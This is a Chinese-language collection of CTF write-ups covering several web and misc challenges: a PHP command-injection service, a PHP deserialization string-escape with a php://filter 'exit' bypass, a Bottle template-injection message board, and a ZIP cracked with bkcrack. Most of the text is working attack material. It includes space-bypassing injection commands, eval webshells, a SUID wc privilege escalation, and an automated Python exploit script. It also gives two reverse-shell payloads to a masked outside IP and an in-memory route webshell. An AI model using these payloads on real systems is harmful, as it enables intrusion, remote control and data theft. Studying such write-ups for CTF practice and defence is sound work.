htmlspecialchars ($input , ENT_QUOTES, 'UTF-8' );     }     public  static  function  generateRandomString ($length  = 10          return  substr (str_shuffle (str_repeat ($x  = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ' , ceil ($length  / strlen ($x )))), 1 , $length );     } } class  InputValidator      private  $maxLength ;     public  function  __construct ($maxLength          $this ->maxLength = $maxLength ;     }     public  function  validate ($input          if  (strlen ($input ) > $this ->maxLength) {             return  "Input exceeds maximum length of {$this->maxLength}  characters" ;         }         return  true ;     } } class  CommandExecutor      private  $logger ;     public  function  __construct ($logger          $this ->logger = $logger ;     }     public  function  execute ($input          if  (strpos ($input , ' ' ) !== false ) {             $this ->logger->log ("Invalid input: space detected" );             die ('No spaces allowed' );         }         @exec ($input , $output );         $this ->logger->log ("Result: $input " );         return  implode ("\n" , $output );     } } class  ActionHandler      private  $config ;     private  $logger ;     private  $executor ;     public  function  __construct ($config , $logger          $this ->config = $config ;         $this ->logger = $logger ;         $this ->executor = new  CommandExecutor ($logger );     }     public  function  handle ($action , $input          if  (!in_array ($action , $this ->config->get ('allowed_actions' ))) {             return  "Invalid action" ;         }         if  ($action  === 'run' ) {             $validator  = new  InputValidator ($this ->config->get ('max_input_length' ));             $validationResult  = $validator ->validate ($input );             if  ($validationResult  !== true ) {                 return  $validationResult ;             }             return  $this ->executor->execute ($input );         } elseif  ($action  === 'debug' ) {             return  "Debug mode enabled" ;         } elseif  ($action  === 'generate' ) {             return  "Random string: "  . StringUtils ::generateRandomString (15 );         }         return  "Unknown action" ;     } } if  (isset ($_REQUEST ['action' ])) {    $config  = new  ConfigLoader ();     $logger  = new  Logger ($config ->get ('log_level' ));     $actionHandler  = new  ActionHandler ($config , $logger );     $input  = $_REQUEST ['input' ] ?? '' ;     echo  $actionHandler ->handle ($_REQUEST ['action' ], $input ); } else  {     $config  = new  ConfigLoader ();     $logger  = new  Logger ($config ->get ('log_level' ));     $userManager  = new  UserManager ($logger );     if  (isset ($_POST ['register' ])) {         $username  = $_POST ['username' ];         $password  = $_POST ['password' ];         echo  $userManager ->addUser ($username , $password );     }     if  (isset ($_POST ['login' ])) {         $username  = $_POST ['username' ];         $password  = $_POST ['password' ];         echo  $userManager ->authenticate ($username , $password );     }     $logger ->log ("No action provided, running default logic" ); } [LOG] No action provided, running default  logic 
可以很快地找到关键代码 
class  CommandExecutor      private  $logger ;     public  function  __construct ($logger          $this ->logger = $logger ;     }     public  function  execute ($input          if  (strpos ($input , ' ' ) !== false ) {             $this ->logger->log ("Invalid input: space detected" );             die ('No spaces allowed' );         }         @exec ($input , $output );         $this ->logger->log ("Result: $input " );         return  implode ("\n" , $output );     } } 
然后,触发点在
if  ($action  === 'run' ) {            $validator  = new  InputValidator ($this ->config->get ('max_input_length' ));             $validationResult  = $validator ->validate ($input );             if  ($validationResult  !== true ) {                 return  $validationResult ;             }             return  $this ->executor->execute ($input ); } 
除了input参数不能出现空格,貌似没什么其他需要注意的地方了,直接/?action=run&input=ls${IFS}/
cat${IFS}/flag,读不出东西,其他都可以读,也没什么特殊报错,[LOG] Result: cat${IFS}/flag
这个时候就要考虑SUID提权 了,先写入后门 ,echo${IFS}'<?=eval($_POST[1]);?>'${IFS}>shell.php,只能说很奇葩,双引号 有问题,然后我弄base64的话也是有点问题,最后选择了无标签的,还能省空格
然后拿蚁剑连上,右键打开虚拟终端 
find / -user root -perm -4000 -print  2>/dev/null /var/www/html/wc /bin/umount /bin/mount /bin/su /usr/bin/newgrp /usr/bin/passwd /usr/bin/chfn /usr/bin/gpasswd /usr/bin/chsh 
只有wc 能试试了,去搜了一下真有,wc提权 
./wc --files0-from "/flag"
大致功能就是注册、登录、写文件
waf.php
<?php function  waf ($c     $lists =["flag" ,"'" ,"\\" ,"sleep" ,"and" ,"||" ,"&&" ,"select" ,"union" ];     foreach ($lists  as  $list ){         $c =str_replace ($list ,"error" ,$c );     }          return  $c ; } 
一看这个waf就知道是字符串逃逸 了,看一下后面的死亡绕过,必须要拿到isadmin=1,因为有别的什么签名秘钥之类的操作,所以我们是登不上admin账号的,但我们可以通过用户名的字符串逃逸 实现我们要的isadmin=1,有这个足矣
根据User类我们可以手搓一下它的序列化数据 
O:4 :"User" :2 :{s:8 :"username" ;s:5 :"admin" ;s:7 :"isadmin" ;b:1 ;} 因为我们不是真正的admin,所以要在用户名这里使isadmin=1 ,即用户名后追加 ";s:7:" isadmin";b:1;},这里有21个字符,需要使用flag逃逸21次,变成下面的  O:4:" User":2:{s:8:" username";s:105:" flagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflag";s:7:" isadmin";b:1;}" ;s:7 :"isadmin" ;b:0 ;}error替换后,后面的 ";s:7:" isadmin";b:0;}就会逃逸出去,不起作用  
所以我们的用户名直接就是,flagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflag";s:7:"isadmin";b:1;},然后拿这个用户名去随便注册就可以了
同时,dashboard.php这里还有个php死亡绕过 
$userData  = checkSignedCookie ();if  ($userData ) {         $user =unserialize ($userData );          if ($user ->isadmin){         $tmp =file_get_contents ("tmp/admin.html" );         echo  $tmp ;         if ($_POST ['txt' ]) {         	$content  = '<?php exit; ?>' ; 		$content  .= $_POST ['txt' ]; 		file_put_contents ($_POST ['filename' ], $content );         }     }     else {         $tmp =file_get_contents ("tmp/admin.html" );         echo  $tmp ;     	if ($_POST ['txt' ]||$_POST ['filename' ]){         echo  "<h1>权限不足,写入失败<h1>" ; }     } } else  {     echo  'token验证失败' ; } 
filename=php://filter//convert.base64-decode/resource=/var/www/html/shell.phptxt=aPD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+,作用就是将<?php exit(); ?>.$content进行base64编码后写入文件shell.php中,因为phpexita会被进行base64解码成php无法识别的内容而无法解析 ,但是PD9waHAgc3lzdGVtKCJjYXQgL2ZsYWciKTs/Pg==的base64解码成<?php eval($_POST[1]);?>被php解析执行 
最后就是,连接木马,读取flag的操作了
官方给了自动化脚本
import  requestsdef  exp (url ):    data = {"username" : 'flagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflag";s:7:"isadmin";b:1;}' ,"password" :"123456" }     r = requests.post(url+"register.php" , data=data)          session = requests.Session()     login_response = session.post(url+"login.php" , data=data)     shell = {"filename" : "php://filter/convert.base64-decode/resource=/var/www/html/shell.php" ,"txt" :"aPD9waHAgZXZhbCgkX1BPU1RbMTIzXSk/Pg==" }     protected_response = session.post(url+"dashboard.php" , data=shell)     response = requests.post(url+"shell.php" , data={"123" : "system('cat / flag')" })     print (response.text) if  __name__ == "__main__" :    url = "http://node2.anna.nssctf.cn:28932/"      exp(url) 
from  bottle import  Bottle, request, template, runapp = Bottle() messages = [] def  handle_message (message ):    message_items = "" .join([f"""          <div class="message-card">             <div class="message-content">{msg} </div>             <small class="message-time">#{idx + 1 }  - 刚刚</small>         </div>     """  for  idx, msg in  enumerate (message)])    board = f"""<!DOCTYPE html>      <html lang="zh">     <head>         <meta charset="UTF-8">         <meta name="viewport" content="width=device-width, initial-scale=1.0">         <title>简约留言板</title>         <link href="https://cdn.bootcdn.net/ajax/libs/twitter-bootstrap/5.1.3/css/bootstrap.min.css" rel="stylesheet">     </head>     <body>         <div class="container">             <div class="d-flex justify-content-between align-items-center mb-4">                 <h1 class="mb-0">📝 简约留言板</h1>                 <a                      href="/Clean"                      class="btn btn-danger"                     onclick="return confirm('确定要清空所有留言吗?此操作不可恢复!')"                 >                     🗑️ 一键清理                 </a>             </div>             <form action="/submit" method="post">                 <textarea                      name="message"                      placeholder="输入payload暴打出题人"                     required                 ></textarea>                 <div class="d-grid gap-2">                     <button type="submit" class="btn-custom">发布留言</button>                 </div>             </form>             <div class="message-list mt-4">                 <div class="d-flex justify-content-between align-items-center mb-3">                     <h4 class="mb-0">最新留言({len (message)} 条)</h4>                     {f'<small class="text-muted">点击右侧清理按钮可清空列表</small>'  if  message else  '' }                  </div>                 {message_items}              </div>         </div>     </body>     </html>"""     return  board def  waf (message ):    return  message.replace("{" , "" ).replace("}" , "" ) @app.route('/'  def  index ():    return  template(handle_message(messages)) @app.route('/Clean'  def  Clean ():    global  messages     messages = []     return  '<script>window.location.href="/"</script>'  @app.route('/submit' , method='POST'  def  submit ():    message = waf(request.forms.get('message' ))     messages.append(message)     return  template(handle_message(messages)) if  __name__ == '__main__' :    run(app, host='localhost' , port=9000 ) 
审一下代码,发现有过滤花括号 的waf,以及template模板渲染 
试了一下,发现可以xss,并且内容留在了前端页面上,话说xss这种打法除了cookie外带 这种我好像没见过什么其他操作了()
<div  class ="message-card" >     <div  class ="message-content" > <script > alert(1)</script > </div >      <small  class ="message-time" > #1 - 刚刚</small >  </div > <div  class ="message-card" >     <div  class ="message-content" > 123</div >      <small  class ="message-time" > #2 - 刚刚</small >  </div > 
可以考虑闭合</div>,题目用是bottle,不妨看看有没有bottle模板注入 
看一下官方文档 ,可以嵌入python代码 ,以%开始
所谓闭合,就是我们自己填上里面的<div>的后半部分使得最外面的<div>成为完整的一部分,然后剩下的</div>我们需要补上它的<div>头,然后我们就可以在二者之间插入我们的恶意python代码 了
</div><small class="message-time" > %__import__('os' ).popen("cat /flag" ).read () <div class="message-card" >< class="message-content" >123 </div><small class="message-time" > %__import__('os' ).popen("cat /flag > 1.txt" ).read () <div class="message-card" >< class="message-content" >123 </div><small class="message-time" > %include("1.txt" ) <div class="message-card" >< class="message-content" >123 </div><small class="message-time" > %python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('8.x.x.x',2333));[os.dup2(s.fileno(),i) for i in range(3)];p=subprocess.call(['/bin/bash','-i'])"  <div class="message-card" >< class="message-content" >123 </div><small class="message-time" > %__import__('os' ).popen("python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"8.x.x.x\",2333));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"sh\")'" ).read () <div class="message-card" >< class="message-content" >123 </div><small class="message-time" > % from bottle import Bottle, request % app=__import__('sys' ).modules['__main__' ].__dict__['app' ] % app.route("/shell" ,"GET" ,lambda :__import__('os' ).popen(request.params.get('cmd' )).read ()) <div class="message-card" >< class="message-content" >123 
内存马 
是需要闭合的吧,但是出题人那好像没写
是个黑盒题,发现了%直接就触发了waf,然后出题人这里说是,白名单之后加了一些AST的语法检测,在我们语法报错的时候会变量替换
在python里% xxx这本身就是一个错误的语法,为了让它可以通过语法检测(然而语法检测这种东西肯定针对的是代码),将它变成字符串 就可以了,所以用引号包裹就可以绕过AST的检测
payload的话,这里好像只有内存马 生效了,其他的可以多试几次就可以了
""" % from bottle import Bottle, request % app=__import__('sys').modules['__main__'].__dict__['app'] % app.route("/shell","GET",lambda :__import__('os').popen(request.params.get('cmd')).read()) """ 
先爆破一下密码,发现好像爆不出来,然后注意到压缩包里面是图片,使用bkcrack进行已知明文攻击 (这里是符合攻击条件的),因为png头是固定的 
.\bkcrack.exe -C .\mybrave.zip -c mybrave.png -x 0 89504E470D0A1A0A0000000D49484452 .\bkcrack.exe -C .\mybrave.zip -c mybrave.png -k 97d30dcc 173b15a8 6e0e7455 -r 1..12 ?p .\bkcrack.exe -C .\mybrave.zip -c mybrave.png -k 97d30dcc 173b15a8 6e0e7455 -d mybrave.png 
一开始爆12位密码无果,还是直接恢复出来吧解base64 即可
唉,也只能四处抄抄学学了